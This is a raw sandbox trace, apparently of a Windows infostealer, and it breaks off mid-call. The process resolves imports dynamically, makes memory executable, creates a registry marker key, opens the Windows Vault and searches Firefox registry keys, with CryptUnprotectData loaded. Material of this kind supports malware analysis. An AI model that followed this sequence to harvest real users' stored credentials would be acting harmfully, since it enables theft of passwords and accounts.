BaseAddress=0x74f40000, Name="wsprintfA", Ordinal=0x0, ProcedureAddress=0x2df9fc | out: ProcedureAddress=0x2df9fc*=0x74f6ae5f) returned 0x0 [0159.007] RtlInitAnsiString (in: DestinationString=0x2dfa08, SourceString="WINHTTP.dll" | out: DestinationString="WINHTTP.dll") [0159.007] RtlAnsiStringToUnicodeString (in: DestinationString=0x2dfa00, SourceString="WINHTTP.dll", AllocateDestinationString=1 | out: DestinationString="WINHTTP.dll") returned 0x0 [0159.007] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="WINHTTP.dll", BaseAddress=0x2df9f8 | out: BaseAddress=0x2df9f8*=0x747f0000) returned 0x0 [0159.331] RtlInitAnsiString (in: DestinationString=0x2dfa08, SourceString="WinHttpOpen" | out: DestinationString="WinHttpOpen") [0159.331] LdrGetProcedureAddress (in: BaseAddress=0x747f0000, Name="WinHttpOpen", Ordinal=0x0, ProcedureAddress=0x2df9fc | out: ProcedureAddress=0x2df9fc*=0x747f58b9) returned 0x0 [0159.331] RtlInitAnsiString (in: DestinationString=0x2dfa08, SourceString="WS2_32.dll" | out: DestinationString="WS2_32.dll") [0159.331] RtlAnsiStringToUnicodeString (in: DestinationString=0x2dfa00, SourceString="WS2_32.dll", AllocateDestinationString=1 | out: DestinationString="WS2_32.dll") returned 0x0 [0159.331] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="WS2_32.dll", BaseAddress=0x2df9f8 | out: BaseAddress=0x2df9f8*=0x75bc0000) returned 0x0 [0159.331] LdrGetProcedureAddress (in: BaseAddress=0x75bc0000, Name=0x0, Ordinal=0xc, ProcedureAddress=0x2df9fc | out: ProcedureAddress=0x2df9fc*=0x75bcb131) returned 0x0 [0159.331] LdrProcessRelocationBlock (Address=0xd8000, Count=0x2, TypeOffset=0xda2a8, Delta=0xf0070000) returned 0xda2ac [0159.355] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0159.355] GetProcAddress (hModule=0x76c20000, lpProcName="WideCharToMultiByte") returned 0x76c3170d [0159.355] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryW") returned 0x76c3492b [0159.355] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0159.355] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileW") returned 0x76c5830d [0159.355] GetProcAddress (hModule=0x76c20000, lpProcName="GetVersionExW") returned 0x76c31ae5 [0159.355] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileAttributesW") returned 0x76c31b18 [0159.355] GetProcAddress (hModule=0x76c20000, lpProcName="ReadFile") returned 0x76c33ed3 [0159.356] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileW") returned 0x76c33f5c [0159.356] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0159.356] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0159.356] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenW") returned 0x76c31700 [0159.356] GetProcAddress (hModule=0x76c20000, lpProcName="GlobalUnlock") returned 0x76c4cfdf [0159.356] GetProcAddress (hModule=0x76c20000, lpProcName="GetTempPathW") returned 0x76c4d4dc [0159.356] GetProcAddress (hModule=0x76c20000, lpProcName="GetPrivateProfileIntW") returned 0x76c5298b [0159.356] GetProcAddress (hModule=0x76c20000, lpProcName="RtlMoveMemory") returned 0x77193c40 [0159.356] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0159.356] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentDirectoryW") returned 0x76c35611 [0159.356] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0159.357] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0159.357] GetProcAddress (hModule=0x76c20000, lpProcName="FindClose") returned 0x76c34442 [0159.357] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0159.357] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileMappingA") returned 0x76c35506 [0159.357] GetProcAddress (hModule=0x76c20000, lpProcName="SetCurrentDirectoryW") returned 0x76c41260 [0159.357] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiW") returned 0x76c4d5cd [0159.357] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatW") returned 0x76c5828e [0159.357] GetProcAddress (hModule=0x76c20000, lpProcName="FindNextFileW") returned 0x76c354ee [0159.357] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0159.357] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteFileW") returned 0x76c389b3 [0159.357] GetProcAddress (hModule=0x76c20000, lpProcName="RtlZeroMemory") returned 0x77193c10 [0159.358] GetProcAddress (hModule=0x76c20000, lpProcName="GetFullPathNameW") returned 0x76c340d4 [0159.358] GetProcAddress (hModule=0x76c20000, lpProcName="GetFullPathNameA") returned 0x76c3e2c1 [0159.358] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileA") returned 0x76c353c6 [0159.358] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexW") returned 0x76c3424c [0159.358] GetProcAddress (hModule=0x76c20000, lpProcName="HeapCompact") returned 0x76c34717 [0159.358] GetProcAddress (hModule=0x76c20000, lpProcName="SetFilePointer") returned 0x76c317d1 [0159.358] GetProcAddress (hModule=0x76c20000, lpProcName="SetEndOfFile") returned 0x76c4ce2e [0159.358] GetProcAddress (hModule=0x76c20000, lpProcName="SystemTimeToFileTime") returned 0x76c35a7e [0159.358] GetProcAddress (hModule=0x76c20000, lpProcName="QueryPerformanceCounter") returned 0x76c31725 [0159.358] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForSingleObject") returned 0x76c31136 [0159.358] GetProcAddress (hModule=0x76c20000, lpProcName="UnlockFile") returned 0x76c5cf36 [0159.358] GetProcAddress (hModule=0x76c20000, lpProcName="FlushViewOfFile") returned 0x76c5b909 [0159.359] GetProcAddress (hModule=0x76c20000, lpProcName="LockFile") returned 0x76c5cf1e [0159.359] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForSingleObjectEx") returned 0x76c31151 [0159.359] GetProcAddress (hModule=0x76c20000, lpProcName="UnlockFileEx") returned 0x76c5d594 [0159.359] GetProcAddress (hModule=0x76c20000, lpProcName="FormatMessageA") returned 0x76c55fbd [0159.359] GetProcAddress (hModule=0x76c20000, lpProcName="WriteFile") returned 0x76c31282 [0159.359] GetProcAddress (hModule=0x76c20000, lpProcName="FormatMessageW") returned 0x76c34620 [0159.359] GetProcAddress (hModule=0x76c20000, lpProcName="HeapDestroy") returned 0x76c335b7 [0159.359] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileAttributesA") returned 0x76c35414 [0159.359] GetProcAddress (hModule=0x76c20000, lpProcName="HeapCreate") returned 0x76c34a2d [0159.359] GetProcAddress (hModule=0x76c20000, lpProcName="HeapValidate") returned 0x76c4b17b [0159.359] GetProcAddress (hModule=0x76c20000, lpProcName="FlushFileBuffers") returned 0x76c3469b [0159.360] GetProcAddress (hModule=0x76c20000, lpProcName="HeapSize") returned 0x77163002 [0159.360] GetProcAddress (hModule=0x76c20000, lpProcName="LockFileEx") returned 0x76c5d57c [0159.360] GetProcAddress (hModule=0x76c20000, lpProcName="GetDiskFreeSpaceW") returned 0x76c4f7aa [0159.360] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileMappingW") returned 0x76c31909 [0159.360] GetProcAddress (hModule=0x76c20000, lpProcName="GetDiskFreeSpaceA") returned 0x76cb433f [0159.360] GetProcAddress (hModule=0x76c20000, lpProcName="GetSystemInfo") returned 0x76c349ca [0159.360] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileAttributesExW") returned 0x76c34574 [0159.360] GetProcAddress (hModule=0x76c20000, lpProcName="OutputDebugStringA") returned 0x76c5b2b7 [0159.360] GetProcAddress (hModule=0x76c20000, lpProcName="GetTempPathA") returned 0x76c5276c [0159.360] GetProcAddress (hModule=0x76c20000, lpProcName="LocalFree") returned 0x76c32d3c [0159.360] GetProcAddress (hModule=0x76c20000, lpProcName="GetSystemTime") returned 0x76c35a96 [0159.361] GetProcAddress (hModule=0x76c20000, lpProcName="AreFileApisANSI") returned 0x76cb40d1 [0159.361] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteFileA") returned 0x76c35444 [0159.361] GetProcAddress (hModule=0x76c20000, lpProcName="GetPrivateProfileStringW") returned 0x76c3ea48 [0159.361] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0159.361] GetProcAddress (hModule=0x76c20000, lpProcName="GetSystemTimeAsFileTime") returned 0x76c33509 [0159.361] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0159.361] GetProcAddress (hModule=0x76c20000, lpProcName="GetTickCount") returned 0x76c3110c [0159.361] GetProcAddress (hModule=0x76c20000, lpProcName="OutputDebugStringW") returned 0x76c5d1d4 [0159.361] GetProcAddress (hModule=0x76c20000, lpProcName="GlobalLock") returned 0x76c4d0a7 [0159.361] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0159.361] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0159.361] GetProcAddress (hModule=0x76c20000, lpProcName="FreeLibrary") returned 0x76c334c8 [0159.362] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualQuery") returned 0x76c3445a [0159.362] GetProcAddress (hModule=0x76c20000, lpProcName="UnmapViewOfFile") returned 0x76c31826 [0159.362] GetProcAddress (hModule=0x76c20000, lpProcName="MapViewOfFile") returned 0x76c318f1 [0159.362] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0159.362] GetProcAddress (hModule=0x76c20000, lpProcName="FindFirstFileW") returned 0x76c34435 [0159.362] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileSize") returned 0x76c3196e [0159.362] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0159.362] GetProcAddress (hModule=0x76c20000, lpProcName="GetPrivateProfileSectionNamesW") returned 0x76caa1ea [0159.362] GetProcAddress (hModule=0x76c20000, lpProcName="GetTempFileNameW") returned 0x76c5d1b6 [0159.364] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0159.364] GetProcAddress (hModule=0x76c20000, lpProcName="ExitProcess") returned 0x76c37a10 [0159.364] GetProcAddress (hModule=0x76c20000, lpProcName="IsProcessorFeaturePresent") returned 0x76c35235 [0159.364] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0159.364] GetProcAddress (hModule=0x74d40000, lpProcName="RegCreateKeyExW") returned 0x74d540fe [0159.364] GetProcAddress (hModule=0x74d40000, lpProcName="RegCloseKey") returned 0x74d5469d [0159.364] GetProcAddress (hModule=0x74d40000, lpProcName="RegEnumKeyExW") returned 0x74d546c8 [0159.365] GetProcAddress (hModule=0x74d40000, lpProcName="RegOpenKeyExW") returned 0x74d5468d [0159.365] GetProcAddress (hModule=0x74d40000, lpProcName="RegOpenKeyW") returned 0x74d52459 [0159.365] GetProcAddress (hModule=0x74d40000, lpProcName="RegQueryValueExW") returned 0x74d546ad [0159.365] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0159.365] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryW") returned 0x759e5f65 [0159.365] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0159.365] GetProcAddress (hModule=0x759b0000, lpProcName="CryptUnprotectData") returned 0x759e5a7f [0159.365] GetProcAddress (hModule=0x759b0000, lpProcName="CryptBinaryToStringA") returned 0x759ea8c5 [0159.365] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0159.365] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0159.365] GetProcAddress (hModule=0x74850000, lpProcName="DnsQuery_W") returned 0x7486572c [0159.365] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0159.366] GetProcAddress (hModule=0x77130000, lpProcName="strncmp") returned 0x77192f65 [0159.366] GetProcAddress (hModule=0x77130000, lpProcName="memcmp") returned 0x77162265 [0159.366] GetProcAddress (hModule=0x77130000, lpProcName="memset") returned 0x7715df20 [0159.366] GetProcAddress (hModule=0x77130000, lpProcName="_chkstk") returned 0x7716ad68 [0159.366] GetProcAddress (hModule=0x77130000, lpProcName="_aullshr") returned 0x77168860 [0159.366] GetProcAddress (hModule=0x77130000, lpProcName="_aullrem") returned 0x77170a90 [0159.366] GetProcAddress (hModule=0x77130000, lpProcName="NtUnmapViewOfSection") returned 0x7714fc70 [0159.366] GetProcAddress (hModule=0x77130000, lpProcName="RtlComputeCrc32") returned 0x771effc1 [0159.366] GetProcAddress (hModule=0x77130000, lpProcName="RtlCompareMemory") returned 0x77193b00 [0159.366] GetProcAddress (hModule=0x77130000, lpProcName="memmove") returned 0x77168f50 [0159.367] GetProcAddress (hModule=0x77130000, lpProcName="_aulldvrm") returned 0x7715f880 [0159.367] GetProcAddress (hModule=0x77130000, lpProcName="strcspn") returned 0x771ac490 [0159.367] GetProcAddress (hModule=0x77130000, lpProcName="_alldiv") returned 0x771a8d00 [0159.367] GetProcAddress (hModule=0x77130000, lpProcName="_alldvrm") returned 0x771abc40 [0159.367] GetProcAddress (hModule=0x77130000, lpProcName="_allmul") returned 0x77172760 [0159.367] GetProcAddress (hModule=0x77130000, lpProcName="_allrem") returned 0x771abd80 [0159.367] GetProcAddress (hModule=0x77130000, lpProcName="_allshl") returned 0x77163140 [0159.367] GetProcAddress (hModule=0x77130000, lpProcName="_aulldiv") returned 0x7718b140 [0159.367] GetProcAddress (hModule=0x77130000, lpProcName="memcpy") returned 0x77152340 [0159.367] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x755e0000 [0159.367] GetProcAddress (hModule=0x755e0000, lpProcName="CoInitialize") returned 0x755fb636 [0159.368] GetProcAddress (hModule=0x755e0000, lpProcName="CoUninitialize") returned 0x756286d3 [0159.368] GetProcAddress (hModule=0x755e0000, lpProcName="GetHGlobalFromStream") returned 0x756041d5 [0159.368] GetProcAddress (hModule=0x755e0000, lpProcName="CoCreateInstance") returned 0x75629d0b [0159.368] GetProcAddress (hModule=0x755e0000, lpProcName="CreateStreamOnHGlobal") returned 0x7560363b [0159.368] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x75220000 [0159.368] GetProcAddress (hModule=0x75220000, lpProcName=0x2) returned 0x75224642 [0159.368] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75fd0000 [0159.368] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0159.368] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x75340000 [0159.368] GetProcAddress (hModule=0x75340000, lpProcName="StrRChrIW") returned 0x7537e782 [0159.368] GetProcAddress (hModule=0x75340000, lpProcName="StrStrIW") returned 0x753546e9 [0159.369] GetProcAddress (hModule=0x75340000, lpProcName="StrStrIA") returned 0x7534d250 [0159.369] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0159.369] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfA") returned 0x74f6ae5f [0159.369] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0159.369] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0159.369] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpenRequest") returned 0x747f4aea [0159.369] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0159.369] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReadData") returned 0x747fcb9e [0159.369] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpAddRequestHeaders") returned 0x74809dfb [0159.369] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCloseHandle") returned 0x747f2c01 [0159.369] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpConnect") returned 0x747fd9f5 [0159.370] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSendRequest") returned 0x747f79bd [0159.370] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetIEProxyConfigForCurrentUser") returned 0x7480257e [0159.370] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpSetOption") returned 0x747f3f6c [0159.370] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpReceiveResponse") returned 0x747fb262 [0159.370] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpCrackUrl") returned 0x7480953a [0159.370] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpGetProxyForUrl") returned 0x747fd5dc [0159.370] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0159.370] GetProcAddress (hModule=0x75bc0000, lpProcName=0xc) returned 0x75bcb131 [0159.370] VirtualProtect (in: lpAddress=0x70000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x2dfb04 | out: lpflOldProtect=0x2dfb04*=0x40) returned 1 [0159.371] VirtualProtect (in: lpAddress=0x70000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x2dfb04 | out: lpflOldProtect=0x2dfb04*=0x4) returned 1 [0159.381] VirtualQuery (in: lpAddress=0xe02cd, lpBuffer=0x2dfafc, dwLength=0x1c | out: lpBuffer=0x2dfafc*(BaseAddress=0xe0000, AllocationBase=0xe0000, AllocationProtect=0x40, RegionSize=0x74000, State=0x1000, Protect=0x40, Type=0x40000)) returned 0x1c [0159.381] GetProcessHeap () returned 0x8e0000 [0159.381] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x364) returned 0x9047e8 [0159.381] RtlMoveMemory (in: Destination=0x9047e8, Source=0xe02cd, Length=0x363 | out: Destination=0x9047e8) [0159.381] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0xe02cd) returned 0x0 [0159.389] CoInitialize (pvReserved=0x0) returned 0x0 [0159.408] GetProcessHeap () returned 0x8e0000 [0159.408] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x104) returned 0x909018 [0159.408] wsprintfW (in: param_1=0x909018, param_2="%s\\%08x" | out: param_1="Software\\2428a83e") returned 17 [0159.408] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\2428a83e", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x2dfaf8, lpdwDisposition=0x2dfafc | out: phkResult=0x2dfaf8*=0x100, lpdwDisposition=0x2dfafc*=0x1) returned 0x0 [0159.408] RegCloseKey (hKey=0x100) returned 0x0 [0159.408] VirtualQuery (in: lpAddress=0x909018, lpBuffer=0x2dfac0, dwLength=0x1c | out: lpBuffer=0x2dfac0*(BaseAddress=0x909000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0159.409] GetProcessHeap () returned 0x8e0000 [0159.409] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x909018 | out: hHeap=0x8e0000) returned 1 [0159.409] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x2dfb10 | out: ppstm=0x2dfb10*=0x9043c0) returned 0x0 [0159.410] IStream:SetSize (This=0x9043c0, libNewSize=0x0) returned 0x0 [0159.410] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0159.412] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0159.412] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfadc*=0x0, cb=0x4, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x4) returned 0x0 [0159.412] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfae8*=0x1, cb=0x2, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x2) returned 0x0 [0159.412] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfaec*=0x0, cb=0x2, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x2) returned 0x0 [0159.413] GetVersionExW (in: lpVersionInformation=0x2df9d0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2df9d0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0159.413] LoadLibraryW (lpLibFileName="vaultcli.dll") returned 0x747e0000 [0159.569] GetProcAddress (hModule=0x747e0000, lpProcName="VaultOpenVault") returned 0x747e26a9 [0159.570] GetProcAddress (hModule=0x747e0000, lpProcName="VaultCloseVault") returned 0x747e2718 [0159.570] GetProcAddress (hModule=0x747e0000, lpProcName="VaultEnumerateItems") returned 0x747e3099 [0159.570] GetProcAddress (hModule=0x747e0000, lpProcName="VaultGetItem") returned 0x747e3242 [0159.570] GetProcAddress (hModule=0x747e0000, lpProcName="VaultFree") returned 0x747e4321 [0159.570] VaultOpenVault () returned 0x0 [0160.164] VaultEnumerateItems () returned 0x0 [0160.164] VaultFree () returned 0x0 [0160.164] VaultCloseVault () returned 0x0 [0160.165] FreeLibrary (hLibModule=0x747e0000) returned 1 [0160.166] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x2 | out: plibNewPosition=0x2) returned 0x0 [0160.166] IStream:SetSize (This=0x9043c0, libNewSize=0x0) returned 0x0 [0160.167] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0160.167] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x2 | out: plibNewPosition=0x2) returned 0x0 [0160.167] IStream:RemoteSeek (in: This=0x9043c0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0160.167] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfadc*=0x0, cb=0x4, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x4) returned 0x0 [0160.167] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfae8*=0x2, cb=0x2, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x2) returned 0x0 [0160.167] ISequentialStream:RemoteWrite (in: This=0x9043c0, pv=0x2dfaec*=0x0, cb=0x2, pcbWritten=0x2dfad0 | out: pcbWritten=0x2dfad0*=0x2) returned 0x0 [0160.167] StrStrIW (lpFirst="Software\\Mozilla", lpSrch="Firefox") returned 0x0 [0160.169] GetProcessHeap () returned 0x8e0000 [0160.169] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x90fb70 [0160.170] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla", phkResult=0x2dfab8 | out: phkResult=0x2dfab8*=0x100) returned 0x0 [0160.170] RegEnumKeyExW (in: hKey=0x100, dwIndex=0x0, lpName=0x90fb70, lpcchName=0x2dfab4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Firefox", lpcchName=0x2dfab4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0160.170] lstrlenW (lpString="Software\\Mozilla") returned 16 [0160.170] lstrlenW (lpString="\\") returned 1 [0160.170] GetProcessHeap () returned 0x8e0000 [0160.170] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x24) returned 0x903b48 [0160.170] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla" | out: lpString1="Software\\Mozilla") returned="Software\\Mozilla" [0160.170] lstrcatW (in: lpString1="Software\\Mozilla", lpString2="\\" | out: lpString1="Software\\Mozilla\\") returned="Software\\Mozilla\\" [0160.170] lstrlenW (lpString="Software\\Mozilla\\") returned 17 [0160.170] lstrlenW (lpString="Firefox") returned 7 [0160.170] GetProcessHeap () returned 0x8e0000 [0160.170] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x32) returned 0x8f9a40 [0160.170] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\" | out: lpString1="Software\\Mozilla\\") returned="Software\\Mozilla\\" [0160.170] lstrcatW (in: lpString1="Software\\Mozilla\\", lpString2="Firefox" | out: lpString1="Software\\Mozilla\\Firefox") returned="Software\\Mozilla\\Firefox" [0160.170] VirtualQuery (in: lpAddress=0x903b48, lpBuffer=0x2dfa70, dwLength=0x1c | out: lpBuffer=0x2dfa70*(BaseAddress=0x903000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.170] GetProcessHeap () returned 0x8e0000 [0160.170] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x903b48 | out: hHeap=0x8e0000) returned 1 [0160.170] StrStrIW (lpFirst="Software\\Mozilla\\Firefox", lpSrch="Firefox") returned="Firefox" [0160.170] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox", ulOptions=0x0, samDesired=0x20219, phkResult=0x2dfa58 | out: phkResult=0x2dfa58*=0x148) returned 0x0 [0160.170] RegQueryValueExW (in: hKey=0x148, lpValueName="PathToExe", lpReserved=0x0, lpType=0x2dfa5c, lpData=0x0, lpcbData=0x2dfa68*=0x0 | out: lpType=0x2dfa5c*=0x0, lpData=0x0, lpcbData=0x2dfa68*=0x0) returned 0x2 [0160.170] RegCloseKey (hKey=0x148) returned 0x0 [0160.171] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox", ulOptions=0x0, samDesired=0x20119, phkResult=0x2dfa30 | out: phkResult=0x2dfa30*=0x148) returned 0x0 [0160.171] RegQueryValueExW (in: hKey=0x148, lpValueName="PathToExe", lpReserved=0x0, lpType=0x2dfa34, lpData=0x0, lpcbData=0x2dfa40*=0x0 | out: lpType=0x2dfa34*=0x0, lpData=0x0, lpcbData=0x2dfa40*=0x0) returned 0x2 [0160.171] RegCloseKey (hKey=0x148) returned 0x0 [0160.171] GetProcessHeap () returned 0x8e0000 [0160.171] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x1000) returned 0x910b78 [0160.171] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox", phkResult=0x2dfa80 | out: phkResult=0x2dfa80*=0x148) returned 0x0 [0160.171] RegEnumKeyExW (in: hKey=0x148, dwIndex=0x0, lpName=0x910b78, lpcchName=0x2dfa7c, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Crash Reporter", lpcchName=0x2dfa7c, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0160.171] lstrlenW (lpString="Software\\Mozilla\\Firefox") returned 24 [0160.171] lstrlenW (lpString="\\") returned 1 [0160.171] GetProcessHeap () returned 0x8e0000 [0160.171] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x34) returned 0x8f9a80 [0160.171] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Firefox" | out: lpString1="Software\\Mozilla\\Firefox") returned="Software\\Mozilla\\Firefox" [0160.171] lstrcatW (in: lpString1="Software\\Mozilla\\Firefox", lpString2="\\" | out: lpString1="Software\\Mozilla\\Firefox\\") returned="Software\\Mozilla\\Firefox\\" [0160.171] lstrlenW (lpString="Software\\Mozilla\\Firefox\\") returned 25 [0160.171] lstrlenW (lpString="Crash Reporter") returned 14 [0160.172] GetProcessHeap () returned 0x8e0000 [0160.172] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x50) returned 0x90b458 [0160.172] lstrcatW (in: lpString1="", lpString2="Software\\Mozilla\\Firefox\\" | out: lpString1="Software\\Mozilla\\Firefox\\") returned="Software\\Mozilla\\Firefox\\" [0160.172] lstrcatW (in: lpString1="Software\\Mozilla\\Firefox\\", lpString2="Crash Reporter" | out: lpString1="Software\\Mozilla\\Firefox\\Crash Reporter") returned="Software\\Mozilla\\Firefox\\Crash Reporter" [0160.172] VirtualQuery (in: lpAddress=0x8f9a80, lpBuffer=0x2dfa38, dwLength=0x1c | out: lpBuffer=0x2dfa38*(BaseAddress=0x8f9000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1a000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0160.172] GetProcessHeap () returned 0x8e0000 [0160.172] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x8f9a80 | out: hHeap=0x8e0000) returned 1 [0160.172] StrStrIW (lpFirst="Software\\Mozilla\\Firefox\\Crash Reporter", lpSrch="Firefox") returned="Firefox\\Crash Reporter" [0160.172] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Mozilla\\Firefox\\Crash Reporter", ulOptions=0x0, samDesired=0x20219, phkResult=0x2dfa20 | out: 